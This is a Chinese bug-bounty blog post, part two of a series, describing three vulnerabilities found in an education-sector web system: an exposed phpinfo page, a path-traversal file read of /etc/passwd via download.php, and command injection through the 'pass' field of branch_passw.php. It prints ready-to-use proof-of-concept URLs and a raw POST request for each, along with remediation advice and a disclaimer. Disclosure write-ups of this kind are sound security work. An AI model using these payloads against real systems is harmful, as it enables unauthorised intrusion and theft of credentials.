• 记第一次eudsrc拿到RCE(下)


    目录

    前言

    个人介绍 

    挖洞公式

    漏洞介绍

    信息泄露漏洞

    任意文件读取漏洞

    远程命令执行(RCE)漏洞

    漏洞详情

    漏洞点1

    漏洞点2

    漏洞点3

    修复建议

    总结


    前言

                                                                        免责声明

      以下漏洞均已经上报漏洞平台。请勿利用文章内的相关技术从事非法测试。若因此产生一切后果与本博客及本人无关。
      仅接上一篇文章,本来都准备结束了,结果搜索文库,发现文库中还有这个系统没有进行测试的漏洞,既然RCE都有,那其他的会不会有呢,抱着试试的心态进行尝试,成功拿到第二个RCE.

    个人介绍 


                                                          不知名普通本科院校

                                                         软件工程入坑网络安全

                                                      刚入坑教育SRC不到两个月

                                    获得过两张985,211的漏报送证书,和一张教育部的证书

                                                   一张CNVD原创事件型漏洞证书                                             
                                              我的技术与生活——小站首页 | Hexoicon-default.png?t=N7T8https://xiaoyunxi.wiki/                                               

    挖洞公式

                                   运气+长期积累+感想敢做+耐心+细心

    漏洞介绍

    信息泄露漏洞

      漏洞通常由于不当的信息处理和传输造成,比如在错误消息、日志文件或者网页源代码中暴露敏感数据。这些数据可能包括软件版本信息、配置文件内容、用户个人信息等。利用这些信息,攻击者可以对系统进行更有针对性的攻击。

    任意文件读取漏洞

      漏洞允许未经授权的用户读取服务器上的任意文件,通常是由于应用程序在处理文件读取请求时没有正确的验证用户输入。通过这种漏洞,攻击者可以获取任意包含敏感信息的文档、配置文件或者其他不应公开的数据。

    远程命令执行(RCE)漏洞

      RCE漏洞是最危险的漏洞之一,它允许攻击者在没有任何身份验证的情况下远程执行代码或命令。产生RCE的原因通常是由于应用程序使用了不安全的编程实践,比如使用eval()函数执行用户输入的字符串作为代码,或者通过调system()、exec()等函数执行由用户控制的命令。

    漏洞详情

    还是这个页面,惊喜不,没想到前台还是会存在漏洞,本次就从存在常见的未授权,开始测试

    漏洞点1

    前台存在phpinfo.view.php页面存在信息泄露漏洞直接在url后进行拼接:

    poc:

    /tool/view/phpinfo.view.php

    通过使用前台CLI命令执行漏洞获得的管理员密码进行登录 admin/xxxxxxxxxx 进入后台

    漏洞点2

    后台download.php页面存在任意文件读取漏洞,在url后直接拼接poc

    poc:

    /download.php?a=read_txt&file=../../../../etc/passwd

    漏洞点3

    后台branch_passw.php页面存在远程命令执行漏洞(RCE),这里执行远程命令读取密码文件,写入到test_test.txt中

    poc:

    1. POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
    2. Host:
    3. User-Agent: Go-http-client/1.1
    4. Content-Length: 41
    5. Content-Type: application/x-www-form-urlencoded
    6. Cookie: RUIJIEID= xxxxxxxx ;user=admin;
    7. X-Requested-With: XMLHttpRequest
    8. Accept-Encoding: gzip
    9. pass=|cat /etc/psswd>../test_test.txt

    在url后直接拼接/test_test.txt进行访问,存在文件并且返回信息,说明RCE执行成功

    修复建议

      针对前台存在的phpinfo.view.php信息泄露漏洞,建议删除或限制访问该文件,以防止敏感信息泄露。对于后台download.php的任意文件读取漏洞,建议对用户输入进行严格的验证和过滤,确保只允许访问合法文件,并限制可下载的文件类型。针对branch_passw.php页面的远程命令执行(RCE)漏洞,建议对用户输入进行严格的验证和过滤,避免使用不安全的函数,如eval()和exec(),并确保使用最新的安全补丁和配置。同时,可以考虑使用安全编程实践,如参数化查询和预编译语句,以降低安全风险。

    总结

      对一个系统进行渗透过程中需要多查看现有页面的title,技术支持和属性的ico,和特殊的文件名(js)等,当然这些也是通过多看文章和思考长期积累而来的,需要坚持,耐心,细心,这次我就是灵光一闪想到了,这个系统就被拿下了,说不定你也能在无意之间碰到呢。
  • 相关阅读:
    mongoose 搭建 http 服务 -- 编译
    2、树相关算法
    20世纪最佳12部学术专著
    连接mysql数据库报错:host ‘xxx’ is blocked ...
    新基建智慧铁路:高铁沿线综合视频监控及风险智能预警管理方案
    Leetcode 858. Mirror Reflection
    java基础巩固20
    什么是闭包
    zabbix安装部署笔记
    linux--系统文件I/O
  • 原文地址:https://blog.csdn.net/weixin_72543266/article/details/137440839